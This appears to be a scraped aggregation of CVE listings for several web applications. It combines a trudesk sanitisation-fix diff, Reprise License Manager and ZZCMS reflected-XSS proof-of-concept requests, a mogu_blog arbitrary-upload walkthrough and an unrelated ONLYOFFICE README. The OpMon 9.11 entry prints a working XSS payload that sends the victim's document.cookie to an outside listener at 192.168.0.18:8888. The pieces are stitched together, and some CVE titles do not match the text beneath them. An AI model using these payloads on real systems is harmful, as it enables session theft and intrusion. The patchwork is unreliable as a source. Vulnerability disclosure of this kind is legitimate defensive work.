Stored XSS in "Name", "Group Name" & "Title" in GitHub repository polonel/trudesk prior to v1.2.0. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.

@@ -18,6 +18,7 @@ var winston = require('winston') var bcrypt \= require('bcrypt') var \_ \= require('lodash') var Chance \= require('chance') const utils \= require('../helpers/utils')  
// Required for linkage require('./role') @@ -89,10 +90,11 @@ userSchema.pre('findOne', autoPopulateRole).pre('find', autoPopulateRole) userSchema.pre('save', function (next) { var user \= this  
user.username \= user.username.toLowerCase().trim() user.email \= user.email.trim() if (user.fullname) user.fullname \= user.fullname.trim() if (user.title) user.title \= user.title.trim() user.username \= utils.sanitizeFieldPlainText(user.username.toLowerCase().trim()) user.email \= utils.sanitizeFieldPlainText(user.email.trim())  
if (user.fullname) user.fullname \= utils.sanitizeFieldPlainText(user.fullname.trim()) if (user.title) user.title \= utils.sanitizeFieldPlainText(user.title.trim())  
if (!user.isModified('password')) { return next()

CVE-2022-1290: chore(security): fix issue where html was allowed in some input fields · polonel/trudesk@4f48b3b

Permalink

Browse files

chore(security): fix issue where html was allowed in some input fields

*   Loading branch information

Showing with **42 additions** and **19 deletions**.

1.  +11 −1 src/helpers/utils/index.js
2.  +2 −1 src/models/attachment.js
3.  +3 −2 src/models/department.js
4.  +2 −1 src/models/group.js
5.  +3 −1 src/models/notice.js
6.  +3 −2 src/models/role.js
7.  +3 −2 src/models/tag.js
8.  +3 −2 src/models/team.js
9.  +2 −1 src/models/ticket.js
10.  +2 −1 src/models/ticketpriority.js
11.  +2 −1 src/models/tickettype.js
12.  +6 −4 src/models/user.js

Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.

    Multiple Vulnerabilities in Reprise License Manager 14.2Credit: Giulia Melotti Garibaldi//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28363# Vulnerability Title: Reflected Cross-Site Scripting# Severity: Medium# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goform/login_process/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28364# Vulnerability Title: Authenticated Reflected Cross-Site Scripting# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goforms/rlmswitchrCookie: REDACTED/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28365# Vulnerability Title: Unauthenticated Information Disclosure# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.Vulnerability PoC:GET http://HOST:5054/goforms/rlminfo HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveContent-Length: 0//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting

A Cross Site Scripting (XSS) vulnerability exists in OpServices OpMon through 9.11 via the search parameter in the request URL.

    # Exploit Title: Opmon 9.11 - Cross-site Scripting# Date: 2021-06-01# Exploit Author: p3tryx# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time# Version: 9.11# Tested on: Chrome, IE and Firefox# CVE : CVE-2021-43009# URL POC:<script>alert(document.cookie);var i=new Image;i.src="http://192.168.0.18:8888/?"+document.cookie;</script>Url-encoded Payload%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E```*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>[search]=%27};PAYLOAD&x=0&y=0*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>[search]=%27};%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E&x=0&y=0```

CVE-2021-43009: Opmon 9.11 Cross Site Scripting ≈ Packet Storm

mogu_blog_cms 5.2 suffers from upload arbitrary files without any limitation.

1.Black box pentesting

Using mogu2021:mogu2021 to log in the mogu\_blog\_v5.2 backend Management System.

![image](https://user-images.githubusercontent.com/96566383/157186244-d3e77ff9-2dac-420c-bce7-b6f1ea903a8e.png)

Find the Blog Management - Blog Management - Local-file Upload feature .  
![image](https://user-images.githubusercontent.com/96566383/157186279-c44f2b18-29cc-4512-9ca7-87d2b58dcb7a.png)

Click this blue button to select a local image for uploading, and then click the green button to put the image to server side  
![image](https://user-images.githubusercontent.com/96566383/157186295-6c7d33fc-7ddb-4505-bb82-70cf9547b4a5.png)

At this point, use the burp suite to capture the request packet.  
![image](https://user-images.githubusercontent.com/96566383/157186319-807ba3a1-6115-4f3e-aa1b-1264bdcfeb38.png)

and then forward it to the Repeater module.

Try to send a request to upload a normal image and you can see that the image was uploaded successfully.

And the response packet returns the address information of the image.  
![image](https://user-images.githubusercontent.com/96566383/157186355-5fefa9e9-b1e7-4633-abfe-0a6eca6ee687.png)

Splice the address in the response packet with the url to try to access the image we just uploaded .

The whole url :  
http://23.224.61.136:8600//blog/admin/png/2022/3/8/1646708813850.png

You can see the successful access to the uploaded image.  
![image](https://user-images.githubusercontent.com/96566383/157186387-b708e87f-7b0f-4717-8ad2-413b9b944232.png)

Back in the burp suite, try changing the contents of the file in the request package to xss payload，as well as trying to change the file name to an html suffix.  
![image](https://user-images.githubusercontent.com/96566383/157186414-816ad458-60ad-41ba-a65b-994467e411e1.png)

You can see the successful upload and the file path in the response package.

Splice the file path to the url and open a new browser (without admin cookies/session/token) to try to access it.

The whole url :  
http://23.224.61.136:8600///blog/admin/html/2022/3/8/1646709195222.html  
![image](https://user-images.githubusercontent.com/96566383/157186425-660b69c5-d95b-448b-ac80-f9f35d5ff2f5.png)

You can see that the xss payload was successfully executed and that there is an arbitrary file to upload.

Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded.

jsp:  
![image](https://user-images.githubusercontent.com/96566383/157186441-85e809eb-c339-45c8-ad83-717ff9dddb71.png)

php:  
![image](https://user-images.githubusercontent.com/96566383/157186469-65648b7c-42ee-4573-b728-4ad21d9b373a.png)

cpp:  
![image](https://user-images.githubusercontent.com/96566383/157186488-b3ac1f7e-78f6-49ad-950f-eb30a0248e37.png)

2.White box pentest

Based on the url of the image upload request  
(/mogu-picture/file/pictures), we can tell that the class that handles the image upload function is located in the /mogu-picture subproject  
![image](https://user-images.githubusercontent.com/96566383/157186502-b066b777-68a6-49d0-b32c-2bc3efa262a3.png)  
![image](https://user-images.githubusercontent.com/96566383/157186516-88a8ba9e-df7e-4f2b-9dc7-84dc9d8eca38.png)

According to the request url (mogu-picture/file/pictures) continue to locate the FileRestApi.java class

mogu\_blog/mogu\_blog\_v2/mogu\_picture/src/main/java/com/moxi/mogublog/picture/restapi/FileRestApi.java  
![image](https://user-images.githubusercontent.com/96566383/157186535-50930646-5e25-478a-9dc8-445d012e27dd.png)

With @RequestMapping("/file") you can see that all requests for the /file path will be processed by this class

And requests for the /file/pictures path are handled by the uploadPics() method of this class  
![image](https://user-images.githubusercontent.com/96566383/157186551-4c4bdd9d-b3a9-4e09-91dd-65cf7aaf31f0.png)

This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file

This method then calls the batchUploadFile() method of the FileServiceImpl class instance object  
![image](https://user-images.githubusercontent.com/96566383/157186616-275e42ab-9c5c-4ca3-a447-5fc37e5c6116.png)

Follow up in the batchUploadFile() method of the FileServiceImpl class to see its source code  
![image](https://user-images.githubusercontent.com/96566383/157186636-29b425ee-24fe-44b8-a020-3b222deeecd6.png)

The first part of the code is to get some files and system base information, none of which is file-checked

Continuing to follow up to the code for file uploads,

You can see that there is no strict verification of the uploaded file extension, file content, or file format  
![image](https://user-images.githubusercontent.com/96566383/157186650-1a3cba4d-e85e-4718-919d-8d16019c4107.png)

The next code execution reaches the try /catch {} block, which involves the uploadFile() method of the QiniuServiceImpl class  
![image](https://user-images.githubusercontent.com/96566383/157186664-b1181eaa-8056-4526-873b-cf1cb3d3cbb1.png)

Going deeper into this method leads to the uploadSingleFile() method.  
![image](https://user-images.githubusercontent.com/96566383/157186678-c5d3f4fb-966a-4923-bbc3-540a57ddd20c.png)

You can see that the file suffix, file format and file content are still not strictly verified.

Back in the batchUploadFile() method of the FileServiceImpl class,

After checking the code after , not only the code for uploading the QiNiu server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified.

Finally, in the batchUploadFile() method of the FileServiceImpl class, the following code will be executed.  
![image](https://user-images.githubusercontent.com/96566383/157186701-aa19fa04-a502-4139-936e-0790957da957.png)

Set the information of the uploaded file to some settings.

Then save and upload feedback to the client response file.

The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files.

This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.

CVE-2022-27047: mogu_blog_v5.2 backend Management System has an vulnerability of uploading arbitrary files · Issue #62 · moxi624/mogu_blog_v2

A cross-site scripting (XSS) vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers inject arbitrary HTML or JavaScript through /example/editor.

![License](https://camo.githubusercontent.com/1ba1bcada55e01a77a091378cf9e310b9ce0731398e46c0564d5e1c9c8649856/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c6963656e73652d474e552532304147504c25323056332d677265656e2e7376673f7374796c653d666c6174) ![Release](https://camo.githubusercontent.com/20564517469ab8bfb943268c72c7aeffee17d570dd229555b7a08092c82eeeee/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f52656c656173652d76372e302e302d626c75652e7376673f7374796c653d666c6174)

**Overview**

ONLYOFFICE Document Server is a free collaborative online office suite comprising viewers and editors for texts, spreadsheets and presentations, fully compatible with Office Open XML formats: .docx, .xlsx, .pptx and enabling collaborative editing in real time.

Starting from version 6.0, Document Server is distributed under a new name - ONLYOFFICE Docs.

ONLYOFFICE Docs can be used as a part of ONLYOFFICE Workspace or with third-party sync&share solutions (e.g. Nextcloud, ownCloud, Seafile) to enable collaborative editing within their interface.

It has three editions - Community, Enterprise, and Developer.

**Components**

ONLYOFFICE Document Server contains the following components:

*   server - the backend server software layer which is the base for all other components of ONLYOFFICE Document Server.
*   core - server core components of ONLYOFFICE Document Server which enable the conversion between the most popular office document formats (DOC, DOCX, ODT, RTF, TXT, PDF, HTML, EPUB, XPS, DjVu, XLS, XLSX, ODS, CSV, PPT, PPTX, ODP).
*   sdkjs - JavaScript SDK for the ONLYOFFICE Document Server which contains API for all the included components client-side interaction.
*   web-apps - the frontend for ONLYOFFICE Document Server which builds the program interface and allows the user create, edit, save and export text, spreadsheet and presentation documents using the common interface of a document editor.
*   dictionaries - the dictionaries of various languages used for spellchecking in ONLYOFFICE Document Server.
*   sdkjs-plugins - the add-ons for ONLYOFFICE Document Server used for the developers to add specific functions to the editors which are not directly related to the OOXML format.

**Functionality**

ONLYOFFICE Document Server includes the following editors:

*   ONLYOFFICE Document Editor
*   ONLYOFFICE Spreadsheet Editor
*   ONLYOFFICE Presentation Editor

The editors allow you to create, edit, save and export text, spreadsheet and presentation documents and additionally have the features:

*   Collaborative editing
*   Hieroglyph support
*   Reviewing
*   Spell-checking

**ONLYOFFICE Document Server editions**

ONLYOFFICE offers different versions of its online document editors that can be deployed on your own servers.

ONLYOFFICE Docs (packaged as Document Server):

*   Community Edition (`onlyoffice-documentserver` package)
*   Enterprise Edition (`onlyoffice-documentserver-ee` package)
*   Developer Edition (`onlyoffice-documentserver-de` package)

The table below will help you to make the right choice.

Pricing and licensing

Community Edition

Enterprise Edition

Developer Edition

Get it now

Start Free Trial

Start Free Trial

Cost

FREE

Go to the pricing page

Go to the pricing page

Simultaneous connections

up to 20 maximum

As in chosen pricing plan

As in chosen pricing plan

Number of users

up to 20 recommended

As in chosen pricing plan

As in chosen pricing plan

Clusterization

\-

+

+

License

GNU AGPL v.3

Proprietary

Proprietary

**Support**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Documentation

Help Center

Help Center

Help Center

Standard support

GitHub or paid

One year support included

One year support included

Premium support

Contact Us

Contact Us

Contact Us

**Services**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Conversion Service

+

+

+

Document Builder Service

+

+

+

**Interface**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Tabbed interface

+

+

+

Dark theme

+

+

+

125%, 150%, 175%, 200% scaling

+

+

+

White label

\-

\-

+

Integrated test example (node.js)

+

+

+

Mobile web editors

\-

+\*

+\*

**Plugins & Macros**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Plugins

+

+

+

Macros

+

+

+

**Collaborative capabilities**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Two co-editing modes

+

+

+

Comments

+

+

+

Built-in chat

+

+

+

Review and tracking changes

+

+

+

Display modes of tracking changes

+

+

+

Version history

+

+

+

**Document Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Adding Content control

+

+

+

Editing Content control

+

+

+

Layout tools

+

+

+

Table of contents

+

+

+

Navigation panel

+

+

+

Mail Merge

+

+

+

Comparing Documents

+

+

+

**Spreadsheet Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Functions, formulas, equations

+

+

+

Table templates

+

+

+

Pivot tables

+

+

+

Data validation

+

+

+

Conditional formatting

+

+

+

Sparklines

+

+

+

Sheet Views

+

+

+

**Presentation Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Transitions

+

+

+

Presenter mode

+

+

+

Notes

+

+

+

**Form creator features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Adding form fields

+

+

+

Form preview

+

+

+

Saving as PDF

+

+

+

**Security features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

End-to-end encryption via Private Rooms

+

+

\-

Get it now

Start Free Trial

Start Free Trial

\* If supported by DMS

**Documentation**

The easiest way to install ONLYOFFICE Document Server is to use the Docker image. You can also install it from the repository or compile it from source code. The following documentation is available to the community depending on the way you choose:

*   Compiling ONLYOFFICE Document Server for a local server
*   Installing ONLYOFFICE Document Server Linux version
*   Installing ONLYOFFICE Document Server Windows version
*   Installing ONLYOFFICE Document Server Docker version

**ONLYOFFICE Workspace**

ONLYOFFICE Docs packaged as Document Server is a part of **ONLYOFFICE Workspace** that also includes ONLYOFFICE Groups packaged as Community Server, Mail Server, Control Panel and Talk (instant messaging app).

It can also be integrated with third-party sync and share solutions.

**Project information**

Official website: https://www.onlyoffice.com

Code repository: https://github.com/ONLYOFFICE/DocumentServer

Docker Image: https://github.com/ONLYOFFICE/Docker-DocumentServer

License: GNU AGPL v3.0

ONLYOFFICE Docs on official website: https://www.onlyoffice.com/office-suite.aspx

ONLYOFFICE Workspace on official website: https://www.onlyoffice.com/workspace.aspx

List of available integrations: https://www.onlyoffice.com/all-connectors.aspx

**User Feedback and Support**

If you have any problems with or questions about ONLYOFFICE Document Server, please visit our official forum to find answers to your questions: forum.onlyoffice.com or you can ask and answer ONLYOFFICE development questions on Stack Overflow.

CVE-2022-24229: GitHub - ONLYOFFICE/DocumentServer: ONLYOFFICE Document Server is an online office suite comprising viewers and editors for texts, spreadsheets and presentations, fully compatible with Office Open XML

An issue was discovered in ZZCMS 2021. There is a cross-site scripting (XSS) vulnerability in ad_manage.php.

**ZZCMS2021\_XSS\_1****PoC by rerce&rpsate****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.html

software link: https://github.com/Boomingjacob/ZZCMS/raw/main/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

In the file `admin/ad_manage.php` line 18.The variable `$keyword` can be controlled by the `$_REQUEST['keyword']`,then output on line 32 and it not be filtered.

![微信图片_20220119232830](https://user-images.githubusercontent.com/78201553/150162138-4e447143-512b-4a2e-a955-4dee79965266.png)

POC:

1.  First log in to the administrator account.
2.  Visit `http://your-ip/admin/ad_manage.php?keyword=a"><img src=1 onerror='alert(1)'/><"`.
3.  you will see a popup.

![微信图片_20220119232835](https://user-images.githubusercontent.com/78201553/150162365-8362a1ee-aba2-4437-afaf-88ed751d5090.png)

CVE-2021-46437: ZZCMS2021 has a xss vulnerability · Issue #2 · xunyang1/ZZCMS

Social Codia SMS v1 was discovered to contain an arbitrary file upload vulnerability via addteacher.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27349: GitHub - D4rkP0w4r/sms-Unrestricted-File-Upload-RCE-POC

Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Tag

#xss